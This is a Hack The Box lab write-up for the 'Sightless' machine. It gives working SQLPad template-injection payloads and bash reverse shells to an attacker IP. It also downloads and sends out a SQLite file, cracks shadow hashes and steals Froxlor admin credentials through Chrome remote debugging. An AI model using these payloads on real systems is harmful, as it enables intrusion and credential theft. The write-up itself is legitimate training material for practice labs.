Hack The Box / LINUX / 2026-03-27
Hack The Box - Sightless (Linux)
SQLPad SSTI leads to container root shell, credential cracking yields michael access, browser automation credential theft for Froxlor admin, and command execution via PHP-FPM restart command to root.
Target
- IP:
10.129.225.142
Recon
sudo nmap -sC -sV 10.129.225.142 -p- -T5 -v
PORT STATE SERVICE VERSION
21/tcp open ftp
| fingerprint-strings:
| GenericLines:
| 220 ProFTPD Server (sightless.htb FTP Server) [::ffff:10.129.225.142]
| Invalid command: try being more creative
|_ Invalid command: try being more creative
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 c9:6e:3b:8f:c6:03:29:05:e5:a0:ca:00:90:c9:5c:52 (ECDSA)
|_ 256 9b:de:3a:27:77:3b:1b:e1:19:5f:16:11:be:70:e0:56 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://sightless.htb/
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port21-TCP:V=7.94SVN%I=7%D=9/8%Time=66DD755B%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,A3,"220\x20ProFTPD\x20Server\x20\(sightless\.htb\x20FTP\x20S
SF:erver\)\x20\[::ffff:10\.129\.225\.142\]\r\n500\x20Invalid\x20command:\x
SF:20try\x20being\x20more\x20creative\r\n500\x20Invalid\x20command:\x20try
SF:\x20being\x20more\x20creative\r\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Add sightless.htb to /etc/hosts.
Go to http://sightless.htb.
There is a button to sqlpad.sightless.htb, add it to /etc/hosts.
Go to http://sqlpad.sightless.htb and check About.
Version is 6.10.0.
There is a vulnerability: CVE-2022-0944. Useful references:
-
https://vuldb.com/?id.194925
-
https://github.com/advisories/GHSA-xrh7-6fvm-56v5
Initial Access (SQLPad SSTI)
Create a new connection. Choose MySQL. Put this in host field:
{{this}}
Click Test. We get:
getaddrinfo ENOTFOUND [object global]
This confirms SSTI. SQLPad is node.js based.
Use this template:
{{global.process.mainModule.require('child_process').spawnSync('id').stdout}}
We get:
uid=0(root) gid=0(root) groups=0(root)
Likely inside docker container.
{{global.process.mainModule.require('child_process').spawnSync('ls').stdout}}
getaddrinfo ENOTFOUND cache sessions sqlpad.sqlite
{{global.process.mainModule.require('child_process').spawnSync('pwd').stdout}}
/var/lib/sqlpad
{{global.process.mainModule.require('child_process').spawnSync('cat', ['/etc/passwd']).stdout}}
Alternative:
{{global.process.mainModule.require('fs').readFileSync('/etc/passwd')}}
We notice user michael.
{{global.process.mainModule.require('child_process').spawnSync('which', ['wget']).stdout}}
getaddrinfo ENOTFOUND /usr/bin/wget
wget exists, curl does not.
Create file rev with content:
bash -i >& /dev/tcp/10.10.16.14/4444 0>&1
Start listeners:
python3 -m http.server 80
nc -vlnp 4444
Execute:
{{global.process.mainModule.require('child_process').spawnSync('wget', ['http://10.10.16.14/rev', '-O', '/dev/shm/rev']).stdout}}
{{global.process.mainModule.require('child_process').spawnSync('bash', ['/dev/shm/rev']).stdout}}
We get reverse shell. We are root inside docker container.
There is no python3. To upgrade shell to interactive terminal:
script -qc /bin/bash /dev/null
# CTRL+Z
stty raw -echo
fg
Credential Recovery
Download sqlpad.sqlite:
nc -vlnp 8000 > sqlpad.sqlite
wget --post-file=sqlpad.sqlite http://10.10.16.14:8000/
vim sqlpad.sqlite
Clean extra content.
sqlite3 sqlpad.sqlite
.tables
We notice users table.
PRAGMA table_info(users);
0|id|VARCHAR(255)|0||1
1|email|VARCHAR(255)|0||0
2|role|VARCHAR(255)|1||0
3|name|VARCHAR(255)|0||0
4|passhash|VARCHAR(255)|0||0
5|password_reset_id|UUID|0||0
6|data|JSON|0||0
7|signup_at|DATETIME|0||0
8|created_at|DATETIME|1||0
9|updated_at|DATETIME|1||0
10|disabled|TINYINT(1)|0||0
11|sync_auth_role|TINYINT(1)|0||0
12|ldap_id|VARCHAR(255)|0||0
select * from users;
da9a25f7-588c-40f5-89db-58fbebab591f|admin@sightless.htb|admin||$2a$10$cjbITibC.4BQQKJ8NOBUv.p0bG2n8t.RIIKRysR6pZnxquAWsLFcC||||2024-05-15 04:48:09.377 +00:00|2024-05-15 18:16:54.652 +00:00|0||
26113beb-60eb-4a58-81eb-2318e27eb3bf|john@sightless.htb|editor|||2d3499e3-16ba-4b4b-a49e-c7c5dca89f2d|||2024-05-15 12:29:23.725 +00:00|2024-05-15 12:29:27.257 +00:00||0|
Put admin hash into file hash and crack:
hashcat -a 0 -m 3200 ./hash ./rockyou.txt
$2a$10$cjbITibC.4BQQKJ8NOBUv.p0bG2n8t.RIIKRysR6pZnxquAWsLFcC:admin
Not useful.
cat /etc/shadow
We notice:
michael:$6$mG3Cp2VPGY.FDE8u$KVWVIHzqTzhOSYkzJIpFc2EsgmqvPa.q2Z9bLUU6tlBWaEwuxCDEP9UFHIXNUcF2rBnsaFYuJa6DUh/pL2IJD/:19860:0:99999:7:::
Put hash in file and crack:
hashcat -a 0 ./hash ./rockyou.txt
$6$mG3Cp2VPGY.FDE8u$KVWVIHzqTzhOSYkzJIpFc2EsgmqvPa.q2Z9bLUU6tlBWaEwuxCDEP9UFHIXNUcF2rBnsaFYuJa6DUh/pL2IJD/:insaneclownposse
ssh michael@sightless.htb
Use recovered password. Login is successful.
Local Service Abuse to Root
cat /etc/passwd
We notice user john.
cat /etc/apache2/sites-available/000-default.conf
We notice domain admin.sightless.htb on 127.0.0.1:8080.
Add this to /etc/hosts:
127.0.0.1 admin.sightless.htb
ssh michael@sightless.htb -NL 8080:localhost:8080
Go to http://admin.sightless.htb:8080.
It is Froxlor with login form.
Known credentials do not work.
Download pspy64 and upload to victim:
- https://github.com/DominicBreuker/pspy
./pspy64
We notice:
2024/09/09 14:16:28 CMD: UID=1001 PID=1700 | /opt/google/chrome/chrome --type=renderer --headless --crashpad-handler-pid=1649 --no-sandbox --disable-dev-shm-usage --enable-automation --remote-debugging-port=0 --test-type=webdriver --allow-pre-commit-input --ozone-platform=headless --disable-gpu-compositing --lang=en-US --num-raster-threads=1 --renderer-client-id=5 --time-ticks-at-unix-epoch=-1725848905032127 --launc
2024/09/09 14:16:28 CMD: UID=1001 PID=1672 | /opt/google/chrome/chrome --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --disable-dev-shm-usage --use-angle=swiftshader-webgl --use-gl=angle --headless --crashpad-handler-pid=1649 --shared-files=v8_context_snapshot_data:100 --field-trial-handle=3,i,1253023565470462605,4926552177838223311,262144 --disable-features=PaintHolding --variations-seed-version --enable-logging --log-level=0 --enable-crash-reporter
2024/09/09 14:16:28 CMD: UID=1001 PID=1670 | /opt/google/chrome/chrome --type=gpu-process --no-sandbox --disable-dev-shm-usage --headless --ozone-platform=headless --use-angle=swiftshader-webgl --headless --crashpad-handler-pid=1649 --gpu-preferences=WAAAAAAAAAAgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --shared-files --fie
2024/09/09 14:16:28 CMD: UID=1001 PID=1654 | /opt/google/chrome/chrome --type=zygote --no-sandbox --enable-logging --headless --log-level=0 --headless --crashpad-handler-pid=1649 --enable-crash-reporter
2024/09/09 14:16:28 CMD: UID=1001 PID=1653 | /opt/google/chrome/chrome --type=zygote --no-zygote-sandbox --no-sandbox --enable-logging --headless --log-level=0 --headless --crashpad-handler-pid=1649 --enable-crash-reporter
2024/09/09 14:16:28 CMD: UID=1001 PID=1649 | /opt/google/chrome/chrome_crashpad_handler --monitor-self-annotation=ptype=crashpad-handler --database=/tmp/Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=lsb-release=Ubuntu 22.04.4 LTS --annotation=plat=Linux --annotation=prod=Chrome_Headless --annotation=ver=125.0.6422.60 --initial-client-fd=6 --shared-client-connection
2024/09/09 14:16:28 CMD: UID=1001 PID=1647 | /opt/google/chrome/chrome --allow-pre-commit-input --disable-background-networking --disable-client-side-phishing-detection --disable-default-apps --disable-dev-shm-usage --disable-hang-monitor --disable-popup-blocking --disable-prompt-on-repost --disable-sync --enable-automation --enable-logging --headless --log-level=0 --no-first-run --no-sandbox --no-service-autorun --password-store=basic --remote-debugging-port=0 --test-type=webdriver --use-mock-keychain --user-data-dir=/tmp/.org.chromium.Chromium.nAxEN1 data:,
2024/09/09 14:16:28 CMD: UID=1001 PID=1641 |
2024/09/09 14:16:28 CMD: UID=1001 PID=1636 | /home/john/automation/chromedriver --port=39217
2024/09/09 14:16:28 CMD: UID=1001 PID=1635 | /usr/bin/python3 /home/john/automation/administration.py
ss -ltpn
State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN 0 10 127.0.0.1:33921 0.0.0.0:*
LISTEN 0 151 127.0.0.1:3306 0.0.0.0:*
LISTEN 0 511 127.0.0.1:8080 0.0.0.0:*
LISTEN 0 4096 127.0.0.1:44853 0.0.0.0:*
LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
LISTEN 0 70 127.0.0.1:33060 0.0.0.0:*
LISTEN 0 5 127.0.0.1:39217 0.0.0.0:*
LISTEN 0 511 0.0.0.0:80 0.0.0.0:*
LISTEN 0 4096 127.0.0.1:3000 0.0.0.0:*
LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
LISTEN 0 128 *:21 *:*
LISTEN 0 128 [::]:22 [::]:*
ssh michael@sightless.htb -NL 33921:localhost:33921
Open Chrome and go to:
chrome://inspect/#devices
Add target localhost:33921.
A device appears.
Click Inspect.
We can see credentials being filled and successful login. Go to Network tab. Click index.php. In payload we see credentials:
loginname: admin
password: ForlorfroxAdmin
Go to http://admin.sightless.htb:8080/ and login with recovered credentials.
Go to PHP -> PHP-FPM versions.
Set php-fpm restart command to:
bash /dev/shm/rev
Create /dev/shm/rev with:
bash -i >& /dev/tcp/10.10.16.14/4444 0>&1
chmod 777 rev
Start listener:
nc -vlnp 4444
We get reverse shell as root.